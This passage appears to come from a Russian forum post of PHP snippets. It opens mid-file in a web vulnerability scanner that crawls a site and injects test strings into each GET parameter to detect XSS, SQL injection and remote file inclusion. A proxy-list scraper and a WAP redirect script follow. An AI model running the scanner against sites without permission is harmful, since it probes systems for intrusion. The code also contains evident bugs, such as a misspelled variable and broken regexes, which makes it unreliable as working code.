return; } catch_forms($page); $plinks = get_links($page,true); foreach ($plins as $cur){ test_link($cur); } $checkedpages[] = $page ; } /** * Perform a simple GET request,returning an array containing * server-sent headers and content * * @author KingOfSka <[email protected]> * @param string $path Path to the resource to request * @param string $cookie Cookie string to pass along with the request (still to implement....) * @return Array **/ function get($path = '/',$cookie = ''){ global $host,$port,$debug,$reqmade,$checkedlinks; array($ret); $tmp = ''; $conn = fsockopen ("$host", $port, $errno, $errstr, 30); $reqmade++; if($path[0] != '/' AND stripos($path,'http://') === FALSE){$path = '/'.$path;} if (!$conn) { echo "$errstr ($errno)<br>\n"; } else { if ($debug == TRUE){echo "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";} fputs ($conn, "GET $path HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n"); while (!feof($conn)) { $tmp .= fgets ($conn,128); } fclose ($conn); } //echo $tmp; preg_match('#HTTP\/1\.\d (\d\d\d)#',$tmp,$matches); if ($matches[1]!= 200){ $ret = "HTTP Error Code NТА".$matches['1']; if ($debug == TRUE){echo "Debug:\r\n$tmp<br/>\r\n";} } if ($matches[1]== 302 OR $matches[1] == 301){ preg_match('#Location.*)#',$tmp,$matches); if (!in_array($matches[1],$checkedlinks)){ return get($matches[1]); } } $b = preg_split('#Content-Type: text/html#',$tmp); $ret['headers'] = $b[0]; $ret['content'] = $b[1]; if ($debug == TRUE){echo "Debug:\r\n".$ret['headers']."\r\n";} return $ret; } /** * Catches all the links in a webpage, checking they are not pointing to * files external at the host being scanned. * * @author KingOfSka <[email protected]> * @return Array **/ function get_links($data,$getpage = FALSE){ global $host,$links; if ($getpage == TRUE){ $tmp = get($data); $data = $tmp['content']; } preg_match_all('#<a href=[\'"].+?[\'"].+?>#i',$data,$matches); foreach ($matches[0] as $current){ preg_match('#<a href=["\'](.+?)["\'].+?>#i',$current,$matches); $current = $matches[1]; if (is_valid_url($current)){ if (stripos($current,$host) != FALSE OR stripos($current,'http://') === FALSE ){ if ($current[0] == '?'){ $current= 'index.php'.$current; } if (stripos($current,$host) === FALSE OR stripos($current,'http://') === FALSE){ $current = "http://$host/$current"; } if (!in_array($current,$links)){ $retlinks[] = $current ; } } } } return array_unique($retlinks) ; } /** * Parse a link returning an array with the name of the file which * the link is pointing to, and the GET variables passed trhough it. * * @author KingOfSka <[email protected]> * @return Array * @param string $link Link to parse **/ function parse_link($link){ array($ret); $matches = explode('?',$link); $ret['action'] = $matches[0] ; $matches = explode('&',$matches[1]); foreach($matches as $cur){ $matches = explode('=',$cur); $vars[] = $matches[0]; } $ret['vars'] = $vars; return $ret; } /** * Tests a given link echoing found vulnerabilities * * @author KingOfSka <[email protected]> * @return void * @param $link Link to test **/ function test_link($link){ global $host,$port,$locator,$result; $ret = ''; $tmp = ''; $data = parse_link($link); //$data['vars'] = array_merge($data['vars'],$additional_vars); foreach($data['vars'] as $current){ foreach($locator as $testing){ $testing = urlencode($testing); $conn = fsockopen ("$host", $port, $errno, $errstr, 30); if (!$conn) { echo "$errstr ($errno)\r\n"; } else { if (!stripos('?',$data['action'])){ $req = "GET ".$data['action']."?$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n"; }else{ $req= "GET ".$data['action']."&$current=$testing HTTP/1.0\r\nHost: $host\r\nConnection: Close\r\n\r\n"; } fputs ($conn, $req); while (!feof($conn)) { $tmp .= fgets ($conn,128); } fclose ($conn); do_test($tmp,$data['action'],$current); $tmp =''; } } } return; } /** * Removes empty item from a given array * * @return Array * @param $array array to clean **/ function clean_array($array) { foreach ($array as $index => $value) { if(is_array($array[$index])) $array[$index] = clean_array($array[$index]); if (empty($value) OR !is_valid_url($value)) unset($array[$index]); } return $array; } function getmicrotime(){ list($usec, $sec) = explode(" ",microtime()); return ((float)$usec + (float)$sec); } function clean_url_array($array){ foreach ($array as $cur){ echo $cur; if(!is_valid_url($cur)) unset ($array[$cur]); } return $array; } function is_valid_url($url){ if (!eregi("^(http|https)+\/\/)+[a-z0-9_-]+\.+[a-z0-9_-]",$url)){ return FALSE; }else{ return TRUE; } } function do_test($data,$path,$var){ global $result; if (stripos($data,'\'\';!--"<XSS>=') OR stripos($data,"\'\';--\"<XSS>=") OR stripos($data,'<XSS>')){ $result['vuln']['xss'][]=$path."?$var=[XSS]"; } if (stripos($data,'You have an error in your SQL syntax')){ $result['vuln']['sql'][]=$path."?$var=[SQL]"; } if (stripos($data,'Failed opening \'some_inexisistent_file_to_include.php\' for inclusion')){ $result['vuln']['rfi'][]=$path."?$var=[RFI]"; } return; } ?>
Прокси листер www.nntime.com PHP: <? echo "<title>NNtime Proxy List</title>"; function proxylist($site){ $source=file_get_contents($site); preg_match_all("/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}:[0-9]{2,4}/",$source,$matched); return $matched[0]; } $array=proxylist("http://www.nntime.com"); foreach($array as $tek){ $tek=str_replace(" ","",$tek); print $tek."<br>"; } ?> Хотя правильней сделать вывод в файл... Скрипт не мой...
Простенький скрипт перевода в Wap сайт телефона <?php if (strstr($HTTP_USER_AGENT, "Opera Mini")){ header("location: http://wap.site.ru"); }else{ header("location: http://www.site.ru"); } ?>
